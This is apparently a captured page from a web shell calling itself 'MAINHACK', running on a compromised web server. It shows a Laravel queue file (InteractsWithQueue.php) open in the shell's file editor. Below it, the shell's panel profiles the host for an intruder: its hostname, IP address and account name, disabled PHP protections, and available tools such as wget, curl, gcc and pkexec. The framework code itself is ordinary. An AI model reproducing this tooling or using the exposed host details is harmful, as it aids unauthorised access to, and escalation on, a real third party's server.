[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: InteractsWithQueue.php
<?php namespace Illuminate\Queue; use DateTimeInterface; use Illuminate\Contracts\Queue\Job as JobContract; use Illuminate\Queue\Jobs\FakeJob; use Illuminate\Support\InteractsWithTime; use InvalidArgumentException; use PHPUnit\Framework\Assert as PHPUnit; use RuntimeException; use Throwable; trait InteractsWithQueue { use InteractsWithTime; /** * The underlying queue job instance. * * @var \Illuminate\Contracts\Queue\Job|null */ public $job; /** * Get the number of times the job has been attempted. * * @return int */ public function attempts() { return $this->job ? $this->job->attempts() : 1; } /** * Delete the job from the queue. * * @return void */ public function delete() { if ($this->job) { return $this->job->delete(); } } /** * Fail the job from the queue. * * @param \Throwable|string|null $exception * @return void */ public function fail($exception = null) { if (is_string($exception)) { $exception = new ManuallyFailedException($exception); } if ($exception instanceof Throwable || is_null($exception)) { if ($this->job) { return $this->job->fail($exception); } } else { throw new InvalidArgumentException('The fail method requires a string or an instance of Throwable.'); } } /** * Release the job back into the queue after (n) seconds. * * @param \DateTimeInterface|\DateInterval|int $delay * @return void */ public function release($delay = 0) { $delay = $delay instanceof DateTimeInterface ? $this->secondsUntil($delay) : $delay; if ($this->job) { return $this->job->release($delay); } } /** * Indicate that queue interactions like fail, delete, and release should be faked. * * @return $this */ public function withFakeQueueInteractions() { $this->job = new FakeJob; return $this; } /** * Assert that the job was deleted from the queue. * * @return $this */ public function assertDeleted() { $this->ensureQueueInteractionsHaveBeenFaked(); PHPUnit::assertTrue( $this->job->isDeleted(), 'Job was expected to be deleted, but was not.' ); return $this; } /** * Assert that the job was manually failed. * * @return $this */ public function assertFailed() { $this->ensureQueueInteractionsHaveBeenFaked(); PHPUnit::assertTrue( $this->job->hasFailed(), 'Job was expected to be manually failed, but was not.' ); return $this; } /** * Assert that the job was released back onto the queue. * * @param \DateTimeInterface|\DateInterval|int $delay * @return $this */ public function assertReleased($delay = null) { $this->ensureQueueInteractionsHaveBeenFaked(); $delay = $delay instanceof DateTimeInterface ? $this->secondsUntil($delay) : $delay; PHPUnit::assertTrue( $this->job->isReleased(), 'Job was expected to be released, but was not.' ); if (! is_null($delay)) { PHPUnit::assertSame( $delay, $this->job->releaseDelay, "Expected job to be released with delay of [{$delay}] seconds, but was released with delay of [{$this->job->releaseDelay}] seconds." ); } return $this; } /** * Ensure that queue interactions have been faked. * * @return void */ private function ensureQueueInteractionsHaveBeenFaked() { if (! $this->job instanceof FakeJob) { throw new RuntimeException('Queue interactions have not been faked.'); } } /** * Set the base queue job instance. * * @param \Illuminate\Contracts\Queue\Job $job * @return $this */ public function setJob(JobContract $job) { $this->job = $job; return $this; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.56 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002